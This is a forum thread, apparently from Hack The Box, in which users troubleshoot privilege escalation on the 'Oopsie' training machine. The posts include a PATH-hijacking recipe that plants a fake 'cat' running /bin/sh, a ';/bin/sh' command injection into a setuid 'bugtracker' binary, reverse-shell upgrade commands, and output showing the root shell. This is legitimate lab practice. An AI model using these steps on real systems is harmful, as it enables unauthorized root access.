Oopsie Machine - Starting Point

Hey everyone,
I am stuck at the end of the walk through to get the flag of this Machine… The tutorial at the end gives me these steps:

export PATH=.:$PATH
echo ‘/bin/sh’ > cat
chmod +x ./cat

But every time i run the echo ‘/bin/sh’ > cat , i get bash : cat : permission denied… No matter what i do i get the same error again and again…
Any little hint or help ? I would appreciate it…
Thanks…

identical problem here.

There i also command injection, just execute bugtracker and type: ;/bin/sh then hit enter!

Type your comment> @DaChef said:

There i also command injection, just execute bugtracker and type: ;/bin/sh then hit enter!

Thanks @DaChef it was easier that it looked… :smile:
Got user and Root Flags… :smiley:

Type your comment> @m1l0 said:

Type your comment> @DaChef said:

There i also command injection, just execute bugtracker and type: ;/bin/sh then hit enter!

Thanks @DaChef it was easier that it looked… :smile:
Got user and Root Flags… :smiley:

Gj :slight_smile:

GG

where to do command injection excatly? still struggling with this.

Type your comment> @BAACS said:

where to do command injection excatly? still struggling with this.

just goot root! 30 seconds after posting this :smiley: hahahha.

I’m struggling to fully understand the shell upgrade code i.e.

SHELL=/bin/bash script -q /dev/null
Ctrl-Z
stty raw -echo
fg
reset
xterm

I get that SHELL sets the users shell, but it seems to be running “script” and sending the output to null. From googling it seems that script is a kind of command recorder - unclear how his helps! Then I assume the Ctrl-Z is meant to background something (breaks the nc connection for me). stty switches off echoing, ok not sure how this helps.

reset and xterm resets the terminal session.

So I kinda get the individual commands, but can anyone explain how this works as a whole?
Thanks

is anyone else having an issue even getting a result from scans in startpoint…

Type your comment> @DaChef said:

There i also command injection, just execute bugtracker and type: ;/bin/sh then hit enter!

I appreciate your answer bro, may i know wht made this code "export PATH=.:$PATH
echo ‘/bin/sh’ > cat
chmod +x ./cat,"not work in the first place

Type your comment> @Ja4V8s28Ck said:

Type your comment> @DaChef said:

There i also command injection, just execute bugtracker and type: ;/bin/sh then hit enter!

I appreciate your answer bro, may i know wht made this code "export PATH=.:$PATH
echo ‘/bin/sh’ > cat
chmod +x ./cat,"not work in the first place

The correct approach on PATH env variable poisoning would be:
cd /tmp/
echo “/bin/sh” > cat
chmod +x cat
export PATH=/tmp:$PATH

The dot referencing on your current directory is wrong, you need to specify the exact path!

The correct approach on PATH env variable poisoning would be:
cd /tmp/
echo “/bin/sh” > cat
chmod +x cat
export PATH=/tmp:$PATH

@DaChef /tmp or any directory in which your current user has privileges to write.

post removed - posted in wrong thread

Type your comment> @phamilton said:

The correct approach on PATH env variable poisoning would be:
cd /tmp/
echo “/bin/sh” > cat
chmod +x cat
export PATH=/tmp:$PATH

@DaChef /tmp or any directory in which your current user has privileges to write.

This worked from me. Thanks smiley:

Did any of you manage to get the user flag from this machine? If so where did you manage to find the sucker?

Right now bugtracker doesn’t have the setuid bit set, so the cat shell just gives you normal permission. Something to check if you are running everything else right and it just doesn’t work.

robert@oopsie:/tmp$ /usr/bin/bugtracker

: EV Bug Tracker :

Provide Bug ID: 1

$ whoami
robert
$ ls -al /usr/bin/bugtracker
-rwxr-xr-x 1 root root 8792 Apr 16 02:56 /usr/bin/bugtracker

However bugtracker.save still has the setuid bit so that can work:
$ ls -al /usr/bin/bugtracker.save
-rwsr-xr-x 1 root bugtracker 8792 Jan 25 10:14 /usr/bin/bugtracker.save
$ /usr/bin/bugtracker.save

: EV Bug Tracker :

Provide Bug ID: 1

whoami

root

I am able to do that but when do cat /root/root.txt nothing happens

Never mind found it

@NeoCortex2000 said:
Did any of you manage to get the user flag from this machine? If so where did you manage to find the sucker?

I had the same problem and was fooled by the fact that r̶u̶n̶n̶i̶n̶g̶ misusing locate wasn’t turning anything up. You’ll find what you need if you keep looking.